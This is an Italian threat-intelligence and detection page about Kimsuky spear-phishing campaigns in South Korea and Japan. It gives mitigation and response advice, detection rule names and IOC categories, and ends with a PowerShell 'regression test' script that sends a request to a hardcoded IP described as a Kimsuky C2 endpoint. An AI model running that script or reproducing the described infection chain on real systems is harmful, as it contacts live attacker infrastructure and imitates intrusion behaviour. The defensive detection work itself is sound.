Kimsuky Utilizza Strumenti RMM Legittimi nelle Campagne in Asia Nordorientale
Detection stack
- AIDR
- Alert
- ETL
- Query
Sintesi
Gli attori della minaccia Kimsuky stanno conducendo campagne di spear-phishing contro obiettivi in Corea del Sud e Giappone utilizzando file LNK ospitati su OneDrive. Una volta eseguito, il malware stabilisce la persistenza attraverso attività pianificate e recupera script PowerShell per rubare informazioni di sistema, email e battute di tastiera. Gli attaccanti abusano anche di strumenti di controllo remoto legittimi come Chrome Remote Desktop e AnyDesk per mantenere l’accesso mascherandosi con l’attività amministrativa normale.
Indagine
L’indagine ha rivelato una catena di infezione a più fasi che coinvolge file LNK dannosi, VBScript offuscato e script PowerShell. I ricercatori hanno analizzato componenti specializzati tra cui un’estensione dannosa per Chrome progettata per raccogliere dati di Gmail e script utilizzati per installare AnyDesk. Commenti e stringhe di debug in coreano trovati nel codice generato dall’IA suggeriscono anche che gli operatori potrebbero utilizzare l’IA generativa durante lo sviluppo.
Mitigazione
Gli utenti dovrebbero esercitare cautela quando aprono file LNK o link ricevuti da fonti sconosciute, specialmente perché Windows può nascondere le estensioni dei file. Le organizzazioni dovrebbero regolarmente verificare il software installato per evitare distribuzioni non autorizzate di Chrome Remote Desktop o AnyDesk. Si raccomanda inoltre di monitorare le estensioni del browser per permessi eccessivi o inattesi.
Risposta
Se viene rilevata un’attività Kimsuky, i team di sicurezza dovrebbero rivedere le attività pianificate per voci sospette che lanciano wscript.exe or powershell.exe. Processi AnyDesk inattesi e file situati in %appdata% le directory dovrebbero anche essere indagate. Le estensioni del browser e le configurazioni di desktop remoto dovrebbero essere riviste per identificare e rimuovere i meccanismi di accesso non autorizzati.
Flusso di Attacco
Stiamo ancora aggiornando questa parte.
Rilevamenti
File LNK Potenzialmente Malevolo con Doppia Estensione (via cmdline)
LOLBAS WScript / CScript (via process_creation)
LOLBAS Schtasks (via cmdline)
Esecuzione Sospetta dal Profilo Utente Pubblico (via process_creation)
Uso Sospetto di CURL (via cmdline)
Stringhe PowerShell Sospette (via powershell)
Chiamata di Metodi .NET Sospetti da PowerShell (via powershell)
File Sospetti nel Profilo Utente Pubblico (via file_event)
IOC (HashMd5) per rilevare: Abuso di Strumenti di Controllo Remoto Legittimi da parte di Kimsuky nel Nordest Asiatico Parte 2
IOC (HashMd5) per rilevare: Abuso di Strumenti di Controllo Remoto Legittimi da parte di Kimsuky nel Nordest Asiatico Parte 1
IOC (SourceIP) per rilevare: Abuso di Strumenti di Controllo Remoto Legittimi da parte di Kimsuky nel Nordest Asiatico
IOC (DestinationIP) per rilevare: Abuso di Strumenti di Controllo Remoto Legittimi da parte di Kimsuky nel Nordest Asiatico
Rilevamento di Indicatori di Comunicazione C&C di Kimsuky [Connessione di Rete Windows]
Attività Pianificata per l’Esecuzione di VBScript Danni [Windows Powershell]
Esecuzione della Simulazione
Prerequisito: Il Controllo Pre-volo del Telemetria & Baseline deve essere superato.
Ragionamento: Questa sezione dettaglia l’esecuzione precisa della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente le TTP identificate e mirare a generare l’esatta telemetria attesa dalla logica di rilevamento. Esempi astratti o non correlati porteranno a una diagnosi errata.
-
Narrativa dell’Attacco & Comandi: L’avversario ha ottenuto inizialmente un punto d’appoggio sulla workstation Windows tramite un allegato di spear-phishing. Per stabilire il Comando e Controllo (C2) e iniziare l’esfiltrazione delle informazioni di sistema, l’attaccante esegue una one-liner di PowerShell. Questo script è progettato per imitare il comportamento noto del gruppo Kimsuky: contattare un endpoint PHP specifico su un server compromesso per ricevere ulteriori istruzioni. L’obiettivo è confondersi con il traffico web standard colpendo l’esatto endpoint C2 identificato dall’intelligence sulle minacce.
-
Script di Test di Regressione:
# Script di Simulazione C2 di Kimsuky # Questo script simula una richiesta a uno degli URL hardcoded nella regola di rilevamento. $c2_url = "http://103.77.242.187/view.php?type=apple&seed=simulation_test" $user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)" Write-Host "[!] Simulazione di Comunicazione C2 di Kimsuky con: $c2_url" try { # Usando Invoke-WebRequest per generare traffico HTTP a livello proxy $response = Invoke-WebRequest -Uri $c2_url -UserAgent $user_agent -Method Get -ErrorAction Stop Write-Host "[+] Richiesta completata. Codice Stato: $($response.StatusCode)" } catch { Write-Host "[-] Richiesta fallita (previsto se l'IP non è attivo): $($_.Exception.Message)" } -
Comandi di Pulizia:
# Non sono stati creati file persistenti; nessuna pulizia richiesta. # Se un file è stato scaricato, usa: Remove-Item -Path "C:pathtomalicious_file.exe" -Force Write-Host "[*] Pulizia simulazione completata."